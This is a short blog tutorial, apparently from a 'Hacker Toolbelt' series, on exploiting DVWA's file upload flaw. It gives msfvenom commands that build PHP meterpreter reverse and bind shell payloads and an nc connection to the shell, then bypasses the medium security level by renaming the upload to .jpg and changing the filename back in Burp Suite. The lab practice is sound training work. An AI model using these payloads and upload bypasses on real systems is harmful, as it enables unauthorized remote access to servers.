DVWA 1.9+: File Upload with Metasploit Venom

Image for post
Image for post

This article is about file upload as a security flaw. In previous articles we’ve setup our lab and made several exploitations against our target.

You can view those articles here.

File Upload — Low Security


$ msfvenom -h

$ msfvenom -l payloads | grep php

View more info:

$ msfvenom -p php/meterpreter/reverse_tcp --list-options

$ msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -o php_venom.php

Remove ‘/*’ from beginning of file.


Prepare MSF

Execute and


$ msfvenom -p php/bind_php — list-options

$ msfvenom -p php/bind_php LHOST= LPORT=4444 -o php_bind.php

remove ‘/*’ from file.


$ nc 4444

Got a shell

File Upload — Medium Security

Change DVWA Security to medium and try again.

Image for post
Image for post

$ cp php_venom.php php_venom.php.jpg

Image for post
Image for post

Try to run:

Image for post
Image for post

Let’s hack our file upload. Burp suite with Intercetp on

Image for post
Image for post

Return DVWA and upload file again. Go to Burp and change filename:

Image for post
Image for post

Then press Forward and get back to the Browser to see a success file upload. Go to hackable/upload and see php_venom.php updated. We’ve bypassed the medium security protection!

Image for post
Image for post


Again, with the help of tools we’ve hacked this target. In the next article we’ll keep at it using another vector of attack

Hacker Toolbelt

Hacking tools and how-to

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store